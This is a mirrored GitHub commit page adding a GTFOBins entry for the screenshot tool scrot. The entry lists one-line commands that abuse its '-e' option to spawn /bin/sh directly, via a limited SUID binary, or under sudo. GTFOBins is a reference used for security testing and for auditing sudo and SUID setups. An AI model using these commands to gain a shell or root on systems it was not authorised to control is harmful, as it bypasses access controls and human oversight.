1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add scrot

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R 2022-07-02 12:52:03 +02:00 committed by GitHub
parent 885c506d00
commit 887384bc2f
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

10
_gtfobins/scrot.md Normal file
View File

@ -0,0 +1,10 @@
---
description: This requires a running X server.
functions:
shell:
- code: scrot -e /bin/sh
limited-suid:
- code: ./scrot -e /bin/sh
sudo:
- code: sudo scrot -e /bin/sh
---